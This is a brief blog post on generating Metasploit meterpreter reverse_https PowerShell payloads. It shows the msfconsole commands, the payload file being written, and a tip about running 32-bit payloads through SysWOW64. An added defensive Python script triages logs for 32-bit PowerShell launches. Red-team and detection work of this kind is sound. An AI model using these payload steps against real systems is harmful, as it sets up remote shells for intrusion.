Monday, October 8, 2012

Metasploit and PowerShell payloads

Quick post, since I mentioned it in the DerbyCon talk, to mention that Metasploit generates PowerShell and PowerShell .net (looks related to this) payloads.

msf > use payload/windows/meterpreter/reverse_https
msf  payload(reverse_https) > set LHOST
msf  payload(reverse_https) > set LPORT 443
LPORT => 443
msf  payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf  payload(reverse_https) > 

Metasploit generates it based on the old PowerSploit code here. Also, the 64-bit business I mentioned here still applies: if you are on x64, you need to call the PowerShell in SysWOW64 to run 32-bit payloads.

PowerShell version

PowerShell .net version
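
An added example for the SysWOW64 note above (not code from the original post or from Metasploit): a small triage script that flags process-creation records where the 32-bit PowerShell binary ran on a 64-bit host, and separates an explicit SysWOW64 path on the command line from WOW64 redirection by a 32-bit parent. The records are constructed and use Sysmon Event ID 1 field names; the `Host` field, the function names and the two verdict labels are assumptions.

```python
import json
import re

# Constructed sample records (not real telemetry), one JSON object per line,
# using the Sysmon Event ID 1 field names Image, CommandLine and ParentImage.
SAMPLE_EVENTS = r'''
{"Host":"WS01","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -File C:\\Scripts\\inventory.ps1","ParentImage":"C:\\Windows\\explorer.exe"}
{"Host":"WS01","Image":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -File C:\\Temp\\script.ps1","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"Host":"WS02","Image":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -File C:\\Agent\\check.ps1","ParentImage":"C:\\Program Files (x86)\\Agent\\agent.exe"}
this line is not JSON and is skipped
'''

# 32-bit PowerShell (console or ISE) as it appears under SysWOW64 on x64 Windows.
POWERSHELL_32 = re.compile(
    r"\\syswow64\\windowspowershell\\v1\.0\\powershell(_ise)?\.exe$", re.I)


def classify(event):
    """Return a verdict for 32-bit PowerShell launches, or None otherwise."""
    if not POWERSHELL_32.search(event.get("Image", "")):
        return None
    # Heuristic: if the command line itself names SysWOW64, the caller chose
    # the 32-bit binary on purpose. Otherwise a 32-bit parent asked for plain
    # powershell.exe and the WOW64 file system redirector picked SysWOW64,
    # which is the usual source of benign hits (32-bit management agents).
    if "syswow64" in event.get("CommandLine", "").lower():
        return "explicit-syswow64"
    return "wow64-redirected"


def triage(text):
    """Parse JSON-lines process events and return (host, verdict, parent)."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate truncated or non-JSON lines in the export
        verdict = classify(event)
        if verdict:
            findings.append((event.get("Host"), verdict, event.get("ParentImage")))
    return findings


if __name__ == "__main__":
    for host, verdict, parent in triage(SAMPLE_EVENTS):
        print(f"{host}: {verdict} (parent: {parent})")
```

The `explicit-syswow64` hits are the ones worth reviewing first; `wow64-redirected` hits are candidates for an allowlist keyed on the parent image.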

